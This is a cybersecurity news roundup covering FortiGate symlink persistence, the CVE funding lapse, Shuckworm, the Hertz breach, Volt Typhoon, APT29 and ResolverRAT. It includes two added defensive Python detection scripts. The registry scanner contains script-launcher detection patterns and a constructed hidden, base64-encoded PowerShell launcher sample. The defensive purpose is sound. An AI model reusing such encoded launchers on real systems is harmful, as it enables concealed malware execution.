CyberSecurity news

FlagThis

@cyberalerts.io //
Fortinet has issued an urgent advisory, warning customers of a new technique employed by attackers to maintain unauthorized, read-only access to FortiGate devices even after the original vulnerabilities are patched. Attackers are exploiting known FortiGate flaws such as CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762. They achieve persistent access by inserting a symbolic link (symlink) that connects the user file system to the root file system.

This symlink is placed in a directory tied to the SSL-VPN language file function, allowing the attackers to bypass FortiGate patches. Even though the original vulnerabilities have been addressed, the symlink remains in place, giving attackers continued visibility into device configurations. Devices with SSL-VPN functionality disabled are not affected. Because the access is read-only, attackers cannot make direct changes to the device, but they can still read sensitive data.

To combat this threat, Fortinet has released targeted updates across FortiOS versions that automatically remove the symlink through antivirus detection. Changes to the SSL-VPN interface are also implemented to prevent similar abuses. Customers are strongly advised to upgrade to the latest FortiOS versions and thoroughly inspect and recover configurations, treating existing ones as potentially compromised. Security agencies have noted that related compromises may date back to early 2023, emphasizing the need for continuous monitoring, robust patch management, and proactive threat hunting.
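The technique above comes down to a symlink in a user-writable directory whose target lies in the root file system, so that a feature which serves files from that directory ends up serving files outside it. The following check is an added example written for this page, not Fortinet's code or tooling: it walks one directory tree and reports every symlink whose resolved target escapes that tree. The directory it builds for the demonstration is constructed here; the real FortiOS paths are not given on the page.

```python
"""Find symlinks under a directory that resolve to targets outside it.

Added example, not Fortinet's code or tooling. The directory built by
build_demo_tree() is constructed for this example; the real FortiOS paths
used by the SSL-VPN language file feature are not given on the page.
"""
import os
import tempfile
from pathlib import Path


def find_escaping_symlinks(root):
    """Return a list of (link, resolved_target) pairs for every symlink below
    root whose final target is not inside root."""
    root = Path(root).resolve()
    findings = []
    # followlinks=False (the default) lists symlinked directories in dirnames
    # but does not descend into them, so a link to "/" cannot send the walk
    # across the whole file system.
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            entry = Path(dirpath) / name
            if not entry.is_symlink():
                continue
            target = entry.resolve()  # follows the whole link chain
            try:
                target.relative_to(root)  # raises if target is outside root
            except ValueError:
                findings.append((str(entry), str(target)))
    return findings


def build_demo_tree():
    """Constructed sample: a temporary 'language file' directory holding one
    real file, one benign symlink that stays inside the directory, and one
    planted symlink that points at the file system root."""
    base = Path(tempfile.mkdtemp(prefix="lang_"))
    (base / "en.json").write_text("{}")
    (base / "en_alias.json").symlink_to(base / "en.json")
    (base / "planted").symlink_to("/")
    return base


def demo():
    """Build the sample tree, scan it and print any escaping links."""
    base = build_demo_tree()
    findings = find_escaping_symlinks(base)
    for link, target in findings:
        print(f"ALERT: {link} -> {target} resolves outside {base}")
    if not findings:
        print(f"no escaping symlinks under {base}")
    return findings


if __name__ == "__main__":
    demo()
```

The check resolves the full link chain before comparing, so a link to another link that eventually leaves the directory is still caught, and it deliberately does not follow symlinked directories while walking, which keeps a planted link to `/` from turning the scan into a walk of the entire device.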

References:
  • www.cybersecuritydive.com: Fortinet warns of threat activity against older vulnerabilities
  • thehackernews.com: The Hacker News article on Fortinet Warns Attackers Retain FortiGate Access Post-Patching via SSL-VPN Symlink Exploit
  • community.fortinet.com: Technical Tip : Recommended steps to execute in case of a compromise
  • BleepingComputer: Fortinet warns that threat actors use a post-exploitation technique
  • BleepingComputer: Fortinet: Hackers retain access to patched FortiGate VPNs using symlinks
  • Help Net Security: HelpNetSecurity: FortiOS, FortiGate vulnerabilities
  • bsky.app: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • www.helpnetsecurity.com: Hackers exploit old FortiGate vulnerabilities, use symlink trick to retain limited access to patched devices
  • www.bleepingcomputer.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • securityaffairs.com: Fortinet warns attackers can keep read-only access to FortiGate devices even after the original vulnerability is patched.
  • bsky.app: Fortinet has urged customers to install a recent FortiGate firmware update that mitigates a new technique abused in the wild. The technique allows attackers to maintain read-only access to FortiGate devices they previously infected.
  • www.scworld.com: Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched.
  • hackread.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • www.scworld.com: SCWorld brief on Fortinet FortiGate fixes circumvented by symlink exploit
  • The Register - Security: Old Fortinet flaws under attack with new method its patch didn't prevent
  • MSSP feed for Latest: Fortinet Finds Attackers Maintain Access Post-Patch via SSL-VPN Symlink Exploit
  • securityonline.info: Fortinet Uncovers Threat Actor Persistence via Symbolic Link Exploit in FortiGate Devices
  • ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access
  • ciso2ciso.com: Fortinet Issues Fixes After Attackers Bypass Patches to Maintain Access – Source:hackread.com
  • Blog: Threat actors have been observed leveraging a new method to exploit a previously patched vulnerability in Fortinet’s FortiOS operating system—specifically targeting FortiGate VPN appliances. Although Fortinet issued a fix for the original flaw (CVE-2023-27997), researchers found that threat actors can still gain access by manipulating symbolic links (symlinks) during the device’s boot process.
  • BleepingComputer: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.
  • bsky.app: Over 16,000 internet-exposed Fortinet devices have been detected as compromised with a new symlink backdoor that allows read-only access to sensitive files on previously compromised devices.

The Hacker News //
The cybersecurity world is on edge as MITRE, the organization behind the Common Vulnerabilities and Exposures (CVE) program, faces a potential shutdown of the program due to expiring funding from the Department of Homeland Security (DHS). The CVE program is a cornerstone of global vulnerability management, providing a standardized system for identifying and tracking software flaws. This system allows companies, governments, and researchers to share information and coordinate their efforts to address cybersecurity risks.

A lapse in funding for the CVE program would have dire consequences for the cybersecurity landscape. Without a universal framework for tracking software flaws, coordinated disclosures across vendors and governments would become significantly more challenging. This breakdown in coordination would create chaos and uncertainty in vulnerability management, making it harder for organizations to protect themselves against cyberattacks. The potential shutdown of the CVE program is not just a tech industry issue, but a matter of national security.

According to Gary Miliefsky, publisher of Cyber Defense Magazine and a former advisory board member to the CVE/OVAL initiatives, MITRE has confirmed that funding for the CVE and CWE programs will expire on April 16, 2025. While historical CVE records will remain accessible on GitHub, active development, modernization, and oversight of the CVE and CWE systems are now at risk. MITRE has expressed its commitment to CVE as a global resource, but without adequate funding, the future of this essential cybersecurity tool remains uncertain.

References:
  • Cyber Defense Magazine: MITRE CVE Program in Jeopardy
  • Tony Bradley: Cybersecurity World On Edge As CVE Program Prepares To Go Dark
  • Lukasz Olejnik: By cutting what amounts to penny costs, the Trump administration will effectively (temporarily) cripple the global cybersecurity system — CVE. It is a global system for identifying and tracking vulnerabilities that has served as a common language for companies, governments, and researchers worldwide since 1999. The consequence will be a breakdown in coordination between vendors, analysts, and defense systems — no one will be certain they are referring to the same vulnerability. Total chaos.
  • RootWyrm: people, THIS is big and you need it in front of management RIGHT NOW. MITRE has informed the CVE board members that effective TONIGHT, funding to run CVE and CWE is effectively gone. The US federal government contracts MITRE to run these programs including both management, operations, and infrastructure. This not only could but almost certainly will result in disruptions to CVE and CWE including a halt of all operations if new contracts/funding are not secured.
  • Lukasz Olejnik: Farewell, CVE? What's next for cybersecurity?
  • bsky.app: By cutting what amounts to penny costs, the Trump administration will effectively (at least temporarily) cripple the global cybersecurity system — CVE.
  • Tenable Blog: MITRE CVE Program Funding Set To Expire
  • Jon Greig: CISA confirmed on Wednesday evening that it will no longer be running the program as of tomorrow. It is unclear whether they will find a new vendor or try to run it themselves.
  • www.csoonline.com: In a stunning development that demolishes a cornerstone of cybersecurity defense, nonprofit R&D organization MITRE said that its contract with the Department of Homeland Security (DHS) to maintain the Common Vulnerabilities and Exposures (CVE) database, which organizes computer vulnerabilities, will expire at midnight on April 16.
  • The Register - Security: Uncle Sam abruptly turns off funding for CVE program. Yes, that CVE program
  • securityonline.info: MITRE Warns of CVE Program Disruption as U.S. Contract Set to Expire
  • PCMag UK security: Nonprofit That Tracks Software Flaws in Jeopardy Following Funding Cuts
  • Metacurity: Here's my piece on the ending of the CVE contract. "Sasha Romanosky, senior policy researcher at the Rand Corporation, branded the end to the CVE program as 'tragic,' a sentiment echoed by many cybersecurity and CVE experts reached for comment."
  • www.nextgov.com: MITRE-backed cyber vulnerability program to lose funding Wednesday
  • x.com: Post discussing MITRE support for the CVE program expiring
  • www.cyberdefensemagazine.com: MITRE CVE Program in Jeopardy
  • securityboulevard.com: MITRE CVE Program Funding Set To Expire
  • The Hacker News: U.S. Govt. Funding for MITRE's CVE Ends April 16, Cybersecurity Community on Alert
  • krebsonsecurity.com: A Krebs on Security article discussing the funding expiration for the CVE program.
  • Secure Bulletin: MITRE Signals Critical Risk to CVE Program as Federal Funding Expires
  • www.scworld.com: MITRE support expires for 'pillar of cybersecurity industry,' CVE program
  • cybersecuritynews.com: MITRE’s Support for CVE Program Expired Today! – Internal Letter Leaked Online, “MITRE Confirmed”
  • Risky Business Media: Risky Bulletin: MITRE says funding risk could disrupt CVE database
  • Sergiu Gatlan: This comes after MITRE Vice President Yosry Barsoum warned on Tuesday that U.S. government funding for the Common Vulnerabilities and Exposures (CVE) and Common Weakness Enumeration (CWE) programs expires today.
  • The Last Watchdog: MY TAKE: The CVE program crisis isn’t over — it’s a wake-up call for cybersecurity’s supply chain
  • Schneier on Security: Mitre’s CVE’s program—which provides common naming and other informational resources about cybersecurity vulnerabilities—was about to , as the US Department of Homeland Security failed to renew the contract.
  • industrialcyber.co: US CISA extends MITRE CVE, CWE programs with last-minute contract extension, prevents shutdown
  • PCMag UK security: 11th-Hour Funding Saves Program That Tracks Software Vulnerabilities
  • Industrial Cyber: MITRE warns of potential cybersecurity disruptions as US government funding for CVE, CWE programs set to expire
  • hackread.com: CVE Program Stays Online as CISA Backs Temporary MITRE Extension
  • industrialcyber.co: Non-profit organization MITRE has informed that federal government funding for the Common Vulnerabilities and Exposures (CVE) and Common...
  • securebulletin.com: The cybersecurity world faces a significant challenge as the Common Vulnerabilities and Exposures (CVE) program, a cornerstone of global vulnerability management, risks disruption due to expiring federal funding.
  • Security Risk Advisors: Funding for MITRE’s CVE Program Set to Expire, Global Vulnerability Tracking at Risk
  • The DefendOps Diaries: CISA extends funding for CVE program, boosting global cybersecurity collaboration and threat management.
  • www.lastwatchdog.com: MY TAKE: The CVE program crisis isn’t over — it’s a wake-up call for cybersecurity’s supply chain

Pierluigi Paganini@Security Affairs //
The Russia-linked cyber espionage group Shuckworm, also known as Gamaredon or Armageddon, is actively targeting a Western country's military mission based in Ukraine. The campaign, which began in February 2025 and continued through March, involves the deployment of an updated, PowerShell-based version of its GammaSteel infostealer malware. This latest wave of activity underscores Shuckworm's persistent focus on Ukrainian targets, with the group believed to be operating on behalf of Russia's Federal Security Service (FSB). They have historically concentrated their efforts on government, military, and law enforcement targets in Ukraine.

The initial infection vector in this campaign appears to be infected removable drives. Evidence from the Windows Registry's UserAssist key suggests that the infection was triggered from such an external drive. The attack chain is multi-staged and designed to minimize detection. It involves the execution of obfuscated VBScript and PowerShell scripts stored in the registry. This shift towards PowerShell-based tools allows Shuckworm to improve obfuscation and store scripts directly within the Windows Registry, making file-based detection more challenging.

GammaSteel, the malware deployed in this campaign, now has enhanced reconnaissance features. It is capable of capturing screenshots, gathering system information, and enumerating desktop contents and user documents. The malware targets specific file types such as documents, spreadsheets, and PDFs. Shuckworm's exfiltration methods have also become more sophisticated, utilizing PowerShell web requests or cURL with Tor proxies to extract sensitive data stealthily. This campaign demonstrates an increase in sophistication for Shuckworm, with the group leveraging legitimate web services to lower the risk of detection.
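The summary above notes that storing obfuscated VBScript and PowerShell in the Windows Registry defeats file-based detection, which points defenders at the registry values themselves. The scan below is an added example for this page, not Symantec's or anyone else's tooling: it takes registry values as (key, value_name, data) tuples, as a hive export would provide them, and flags values whose data contains script keywords or a long base64 run that decodes to a script (PowerShell's -EncodedCommand takes UTF-16LE base64). The keyword list and length thresholds are assumptions chosen for this example, and the sample records are constructed, not real Shuckworm artefacts.

```python
"""Flag registry string values that carry scripts or encoded script launchers.

Added example, not Symantec's or anyone else's tooling. The marker list and
thresholds are assumptions for this example; the sample records are
constructed and are not real Shuckworm artefacts.
"""
import base64
import binascii
import re

# Tokens that rarely appear in ordinary autostart command lines but are common
# in script launchers and obfuscated VBScript (assumed list; tune per estate).
SCRIPT_MARKERS = re.compile(
    r"(powershell|invoke-expression|\biex\b|-encodedcommand|-enc\b|"
    r"frombase64string|wscript\.shell|createobject|execute\(|chr\()",
    re.IGNORECASE,
)
# A base64 run long enough to hold a script rather than a GUID or a hash.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")


def _decode_script_bytes(raw):
    """UTF-16LE text has a NUL in every second byte for ASCII characters;
    use that to pick the decoder, falling back to UTF-8."""
    if raw and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_b64_runs(data):
    """Yield the decoded text of every long base64 run found in data."""
    for match in B64_RUN.finditer(data):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        yield _decode_script_bytes(raw)


def scan_registry_values(records):
    """Return (key, value_name, reason) for each suspicious string value."""
    findings = []
    for key, name, data in records:
        if not isinstance(data, str):
            continue  # binary and DWORD values are out of scope here
        reasons = []
        if SCRIPT_MARKERS.search(data):
            reasons.append("script keywords in value data")
        if any(SCRIPT_MARKERS.search(text) for text in decode_b64_runs(data)):
            reasons.append("base64 run decodes to a script")
        if not reasons and len(data) > 2000:
            reasons.append("unusually long string value")
        if reasons:
            findings.append((key, name, "; ".join(reasons)))
    return findings


def build_sample_records():
    """Constructed sample hive export: a benign autostart, an encoded
    PowerShell launcher, a value holding an obfuscated VBScript fragment,
    and a harmless string."""
    run_key = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
    launcher = "Invoke-Expression (Get-ItemProperty HKCU:\\Software\\Demo).Payload"
    encoded = base64.b64encode(launcher.encode("utf-16-le")).decode("ascii")
    return [
        (run_key, "OneDrive",
         r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
        (run_key, "Updater", f"powershell.exe -w hidden -enc {encoded}"),
        (r"HKCU\Software\Demo", "Payload",
         "Execute(Chr(77)&Chr(115)&Chr(103)&Chr(66)&Chr(111)&Chr(120))"),
        (r"HKCU\Software\Demo", "Comment", "nothing to see here"),
    ]


if __name__ == "__main__":
    for key, name, reason in scan_registry_values(build_sample_records()):
        print(f"SUSPECT {key}\\{name}: {reason}")
```

The launcher value is caught twice, once on its plaintext `powershell` token and once because the base64 run decodes to an `Invoke-Expression` call, while the staged payload value is caught only on its VBScript markers; the length fallback exists for blobs that use an obfuscation the marker list does not know.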

References:
  • bsky.app: The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives.
  • cyberpress.org: Shuckworm Deploys PowerShell-Based GammaSteel Malware in Precision Attacks
  • gbhackers.com: Shuckworm Group Leverages GammaSteel Malware in Targeted PowerShell Attacks
  • The Hacker News: Shuckworm targets Western military mission
  • Broadcom Software Blogs: Shuckworm Targets Foreign Military Mission Based in Ukraine
  • gbhackers.com: The Russia-linked cyber-espionage group known as Shuckworm (also identified as Gamaredon or Armageddon) has been observed targeting a Western country’s military mission located within Ukraine, employing an updated, PowerShell-based version of its GammaSteel infostealer malware.
  • securityonline.info: Russia-linked espionage group Shuckworm (also known as Gamaredon or Armageddon) has launched a renewed and more sophisticated cyber campaign targeting a foreign military mission based in Ukraine, according to a detailed report by the Symantec Threat Hunter Team. This latest wave of activity, which began in February 2025 and continued through March, underscores Shuckworm’s relentless […]
  • BleepingComputer: The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives. [...]
  • securityonline.info: Shuckworm’s Sophisticated Cyber Campaign Targets Ukraine Military Mission
  • Cyber Security News: Shuckworm Deploys PowerShell-Based GammaSteel Malware in Precision Attacks
  • The Hacker News: Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine
  • www.bleepingcomputer.com: Russian hackers attack Western military mission using malicious drive
  • www.csoonline.com: Russian Shuckworm APT is back with updated GammaSteel malware
  • securityaffairs.com: Gamaredon targeted the military mission of a Western country based in Ukraine
  • The DefendOps Diaries: Explore Gamaredon's evolving cyber tactics targeting Western military missions with advanced evasion techniques and PowerShell tools.
  • www.sentinelone.com: Police arrest SmokeLoader malware customers, AkiraBot abuses AI to bypass CAPTCHAs, and Gamaredon delivers GammaSteel via infected drives.
  • PCMag UK security: A suspected state-sponsored Russian group may have developed the 'GammaSteel' attack to help them spy on and steal data from a military mission in Ukraine. A malware-laden storage drive may have helped Russia spy on military activities in Ukraine.
  • www.scworld.com: Infected removable drives were used to spread the malware.
  • Metacurity: Cybersecurity industry is mum on SentinelOne EO, Comptroller of the Currency lacked MFA on hacked email account, Morocco confirms massive cyber attack, Gamaredon is targeting Western military mission in Ukraine, Ethical hacker stole $2.6m from Morpho Labs, Sex chatbots leak information, much more
  • www.metacurity.com: Cybersecurity industry is mum on SentinelOne EO, Comptroller of the Currency lacked MFA on hacked email account, Morocco confirms massive cyber attack, Gamaredon is targeting Western military mission in Ukraine, Ethical hacker stole $2.6m from Morpho Labs, Sex chatbots leak information, much more
  • ciso2ciso.com: Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine – Source:thehackernews.com
  • ciso2ciso.com: The group targeted the military mission of a Western country, per the report. Infected removable drives have been used by the group.
  • Metacurity: Before you head out for a much-deserved weekend break after this insane week, check out today's Metacurity for the most critical infosec developments you should know, including --China acknowledged US cyberattacks at a secret meeting, report --Cybersecurity industry is mum on SentinelOne EO, --Comptroller of the Currency lacked MFA on hacked email account, --Morocco confirms massive cyber attack, --Gamaredon is targeting Western military mission in Ukraine, --Ethical hacker stole $2.6m from Morpho Labs, --Sex chatbots leak information, --much more
  • Security Risk Advisors: 🚩Shuckworm Compromises Western Military Mission in Ukraine Using Updated PowerShell GammaSteel Malware
  • Security Latest: For the past decade, this group of FSB hackers—including “traitor” Ukrainian intelligence officers—has used a grinding barrage of intrusion campaigns to make life hell for their former countrymen and cybersecurity defenders.

Ross Kelly@Latest from ITPro //
Hertz Corporation has announced a data breach affecting customers of its Hertz, Thrifty, and Dollar car rental brands. The breach stems from the exploitation of Cleo zero-day vulnerabilities in late 2024. Customer data, including personal information and driver's licenses, was stolen. The company confirmed the breach on February 10, 2025, stating that an unauthorized third party acquired Hertz data by exploiting vulnerabilities within Cleo's platform in October and December 2024.

The stolen data varies depending on the region, but generally includes customer names, dates of birth, contact information, driver's licenses, payment card information, and workers' compensation claims. In some instances, Social Security numbers and other government-issued identification numbers were also compromised. Notices about the breach have been posted on Hertz websites for customers in Australia, Canada, the European Union, New Zealand, the United Kingdom, and several U.S. states, including California, Maine, and Texas. Hertz has disclosed that at least 3,400 customers in Maine and some 96,665 customers in Texas were affected.

The company attributed the breach to vulnerabilities in Cleo's software, which was targeted by the Clop ransomware gang in 2024. This breach highlights the significant cybersecurity risks associated with third-party vendors and the potential for mass data theft. It is another example of the widespread consequences that can occur from zero-day exploits in widely used enterprise file transfer products. Those affected have been advised to take precautions to protect their personal and financial information.

References:
  • securityaffairs.com: Hertz disclosed a data breach following 2024 Cleo zero-day attack
  • techcrunch.com: Hertz says customers’ personal data and driver’s licenses stolen in data breach
  • The DefendOps Diaries: Hertz Data Breach: Lessons in Cybersecurity and Vendor Management
  • www.bleepingcomputer.com: Hertz confirms customer info, drivers' licenses stolen in data breach
  • Zack Whittaker: New by me: Car rental giant Hertz has confirmed a data breach affecting customers' personal information, driver's licenses, and payment card data. Customers worldwide are being notified.
  • BleepingComputer: Car rental giant Hertz Corporation warns it suffered a data breach after customer data for its Hertz, Thrifty, and Dollar brands was stolen in the Cleo zero-day data theft attacks.
  • www.itpro.com: Cleo attack victim list grows as Hertz confirms customer data stolen – and security experts say it won't be the last
  • Malwarebytes: Hertz data breach caused by CL0P ransomware attack on vendor Cleo
  • PCMag UK security: Hackers Stole Credit Card, Driver's License Info in Hertz Data Breach
  • Zack Whittaker: Hertz won't say how many are affected by its breach, but continues to notify U.S. states, giving a little indication of the numbers. Per its filing in Texas today, Hertz said 96,665 Texas residents are affected. Plus 3,400 people in Maine and that's already 100,000+ people in two states alone.
  • www.cybersecuritydive.com: Hertz says personal data breached in connection with Cleo file-transfer flaws
  • ComputerWeekly.com: Hertz warns UK customers of Cleo-linked data breach
  • The Register - Security: Where it Hertz: Customer data driven off in Cleo attacks
  • cyberinsider.com: Hertz Confirms Data Breach Following Clop Ransomware Leaks
  • cyberinsider.com: Analysis of how the Clop ransomware group exploited zero-day vulnerabilities to compromise Hertz's systems
  • Help Net Security: Car rental company Hertz suffers a data breach from exploitation of vulnerabilities in third-party software.

@www.wsj.com //
China has reportedly acknowledged its role in cyberattacks against U.S. critical infrastructure, specifically those attributed to the Volt Typhoon campaign. This admission occurred during a secret meeting with U.S. officials in December, according to SecurityWeek. U.S. officials noted that Volt Typhoon's actions, which involved infiltrating various industries' systems through zero-day exploits and other advanced tactics, were an attempt to deter U.S. support for Taiwan. Furthermore, cyberespionage by the Chinese state-backed Salt Typhoon group against U.S. telecommunications firms was also discussed, revealing the compromise of U.S. officials' communications.

These attacks are part of a broader pattern of Chinese state-backed hackers increasing their activity against infrastructure in the U.S., Europe, and the Asia-Pacific region. Recent intelligence indicates groups like Volt Typhoon and Salt Typhoon have infiltrated power grids, telecommunications networks, and transportation systems. Their apparent goal is to preposition for potential wartime disruption or coercive retaliation during periods of geopolitical tension. This approach involves installing dormant "logic bombs" designed to be triggered during a conflict or crisis, maintaining persistent access while minimizing detection risk.

The intensified cyber activities are viewed as a component of China's cyber-enabled irregular warfare strategy. Recent incidents include a power grid failure in Taiwan linked to a Volt Typhoon logic bomb, along with similar occurrences reported in European infrastructure. The attacks' sophistication lies in their "Living Off the Land" techniques, blending state-sponsored hacking with proxy groups and disinformation to achieve strategic objectives without triggering conventional military responses. Such actions, as analyzed by IT security professional Simone Kraus, raise concerns due to their potential for devastating real-world consequences if critical infrastructure is compromised.

References:
  • Sam Bent: In a closed-door Geneva summit, Chinese officials admitted—albeit indirectly—to orchestrating Volt Typhoon cyberattacks on US infrastructure. The move signals escalating covert conflict over Taiwan and exposes the US grid’s vulnerability to prolonged foreign infiltration.
  • DataBreaches.Net: Chinese officials acknowledged in a secret December meeting that Beijing was behind a widespread series of alarming cyberattacks on U.S. infrastructure, according to people familiar with the matter, underscoring how hostilities between the two superpowers are continuing to escalate.
  • www.metacurity.com: China acknowledged US cyberattacks at a secret meeting, report
  • WIRED: China Secretly (and Weirdly) Admits It Hacked US Infrastructure
  • Risky Business Media: China privately admits to hacking American critical infrastructure, the US Treasury was compromised by password spraying, America will sign a global spyware agreement after all, and a Chinese APT is abusing the Windows Sandbox to hide its malware.
  • securityaffairs.com: China admitted its role in Volt Typhoon cyberattacks on U.S. infrastructure, WSJ reports.
  • The Register - Security: China reportedly admitted directing cyberattacks on US infrastructure at a meeting with their American counterparts, according to The Wall Street Journal.…
  • Schneier on Security: China Sort of Admits to Being Behind Volt Typhoon
  • oodaloop.com: China Admitted to Volt Typhoon Cyberattacks on US Critical Infrastructure: Report
  • www.scworld.com: US critical infrastructure attacks reportedly acknowledged by China
  • OODAloop: In a secret meeting that took place late last year between Chinese and American officials, the former confirmed that China had conducted cyberattacks against US infrastructure as part of the campaign known as Volt Typhoon, according to The Wall Street Journal.
  • cybersecuritynews.com: Chinese Hackers Attacking Critical Infrastructure to Sabotage Networks
  • Metacurity: China acknowledged US cyberattacks at a secret meeting, report
  • ciso2ciso.com: China Sort of Admits to Being Behind Volt Typhoon – Source: www.schneier.com
  • WIRED: Brass Typhoon: The Chinese Hacking Group Lurking in the Shadows

@cyberpress.org //
Russian state-sponsored espionage group Midnight Blizzard, also known as APT29 or Cozy Bear, is conducting a spear-phishing campaign targeting European diplomatic organizations. Check Point Research has been observing this sophisticated operation, which began in January 2025 and employs advanced techniques to target government officials and diplomats across Europe. The threat actors are impersonating a major European foreign affairs ministry to send deceptive emails inviting targets to wine-tasting events. This campaign, leveraging custom malware, aims to compromise diplomatic entities, including embassies of non-European countries.

The campaign introduces a previously unseen malware loader called GrapeLoader, along with a new variant of the Wineloader backdoor. The phishing emails, sent from domains like 'bakenhof[.]com' or 'silry[.]com,' contain malicious links that, under specific conditions, initiate the download of a ZIP archive named 'wine.zip'. If the targeting conditions are not met, victims are redirected to the legitimate website of the impersonated ministry, reducing suspicion. This mirrors a previous Wineloader campaign, indicating a continued focus on European diplomacy by APT29.

Once executed via DLL sideloading, GrapeLoader collects host information, establishes persistence by modifying the Windows Registry, and contacts a command-and-control server. The use of in-memory execution is an advanced evasion technique to complicate detection. The objective of the campaign is likely espionage, given APT29's history of targeting high-profile organizations, including government agencies and think tanks, and its association with the SolarWinds supply chain attack.

References:
  • Check Point Blog: Check Point Research has been observing a sophisticated phishing campaign conducted by Advanced Persistent Threat (APT) 29, a Russian-linked threat group.
  • BleepingComputer: Russian state-sponsored espionage group Midnight Blizzard is behind a new spear-phishing campaign targeting diplomatic entities in Europe, including embassies.
  • bsky.app: Midnight Blizzard deploys new GrapeLoader malware in embassy phishing
  • blog.checkpoint.com: Unmasking APT29: The Sophisticated Phishing Campaign Targeting European Diplomacy
  • cyberpress.org: Detailed report about APT29's GRAPELOADER campaign targeting European diplomats.
  • research.checkpoint.com: Renewed APT29 Phishing Campaign Against European Diplomats
  • Cyber Security News: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
  • The Register - Security: Russians lure European diplomats into malware trap with wine-tasting invite
  • iHLS: Russian Phishing Campaign Steals Sensitive Data in European Government Networks
  • cybersecuritynews.com: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
  • www.scworld.com: New APT29 spear-phishing campaign targets European diplomatic organizations
  • www.helpnetsecurity.com: Cozy Bear targets EU diplomats with wine-tasting invites (again)
  • Check Point Research: Renewed APT29 Phishing Campaign Against European Diplomats
  • Help Net Security: Detailed report on the campaign's tactics, techniques, and procedures, including the use of fake wine-tasting invitations.
  • securityonline.info: SecurityOnline: APT29 Targets European Diplomats with Wine-Themed Phishing
  • securityonline.info: APT29 Targets European Diplomats with Wine-Themed Phishing
  • www.csoonline.com: The tactics, techniques, and procedures (TTPs) observed in this campaign bear strong similarities to those seen in the previous WINELOADER campaign from March 2024, The report contains indicators of compromise such as file names, file hashes and C2 URLs that can be used by security teams to build detections and threat hunting queries.

Pierluigi Paganini@securityaffairs.com //
A newly discovered remote access trojan (RAT) called ResolverRAT is actively targeting healthcare and pharmaceutical organizations worldwide. Security researchers at Morphisec have identified this sophisticated malware as a new threat, noting its advanced in-memory execution, API and resource resolution at runtime, and layered evasion techniques. ResolverRAT is designed for stealth and resilience, making static and behavioral analysis significantly more difficult. The malware has been observed in attacks as recently as March 10, indicating an ongoing campaign.

ResolverRAT spreads through meticulously crafted phishing emails, often employing fear-based lures to pressure recipients into clicking malicious links. These emails are localized, using languages spoken in targeted countries, including Hindi, Italian, Czech, Turkish, Portuguese, and Indonesian. The content often revolves around legal investigations or copyright violations to induce a sense of urgency. The infection chain begins with DLL side-loading: a legitimate executable loads the malicious DLL, which injects ResolverRAT into memory, a technique previously observed in Rhadamanthys malware attacks.

Once deployed, ResolverRAT runs a multi-stage bootstrapping process engineered for stealth. The payload is stored encrypted and compressed and exists in decrypted form only in memory, which defeats static analysis of anything written to disk. It also establishes redundant persistence through both the Windows Registry and the file system, so removing one mechanism leaves the other in place. For command-and-control (C2), ResolverRAT uses a bespoke certificate-based authentication that does not rely on the machine's trusted root certificate authorities, so the C2 channel is not subject to the usual trust-chain checks, and it rotates through alternate C2 IP addresses when the primary is unavailable. Together, the secure transport and the fallback logic point to a capable actor investing in resilient infrastructure.

Recommended read:
References :
  • securityaffairs.com: SecurityAffairs: New malware ‘ResolverRAT’ targets healthcare, pharmaceutical firms
  • The Hacker News: The Hacker News: ResolverRAT Campaign Targets Healthcare, Pharma via Phishing and DLL Side-Loading
  • BleepingComputer: BleepingComputer: New ResolverRAT malware targets pharma and healthcare orgs worldwide
  • ciso2ciso.com: New malware ‘ResolverRAT’ targets healthcare, pharmaceutical firms – Source: securityaffairs.com
  • bsky.app: A new remote access trojan (RAT) called 'ResolverRAT' is being used against organizations globally, with the malware used in recent attacks targeting the healthcare and pharmaceutical sectors.
  • Anonymous: ResolverRAT is hitting healthcare and pharma sectors hard — phishing, fear-bait, stealth attacks.
  • Industrial Cyber: ResolverRAT malware attacks pharma and healthcare organizations via phishing and DLL side-loading
  • www.scworld.com: Novel ResolverRAT trojan launched in global attacks against healthcare, pharma
  • Tech Monitor: Researchers identify new ResolverRAT cyber threat affecting global healthcare organisations
  • Security Risk Advisors: 🚩 ResolverRAT Malware Campaign Targets Healthcare and Pharmaceutical Sectors
  • www.morphisec.com: ResolverRAT Malware Campaign Targets Healthcare and Pharmaceutical Sectors
  • www.csoonline.com: New ResolverRAT malware targets healthcare and pharma orgs worldwide

@securityonline.info //
A critical security vulnerability, tracked as CVE-2025-3102, has been disclosed in SureTriggers (since renamed OttoKit), a WordPress automation plugin active on more than 100,000 sites. The flaw lets an unauthenticated attacker bypass authentication and create administrator accounts, which is enough for a complete site takeover. It stems from a missing empty-value check in the plugin's `authenticate_user()` function and affects versions up to and including 1.0.78.

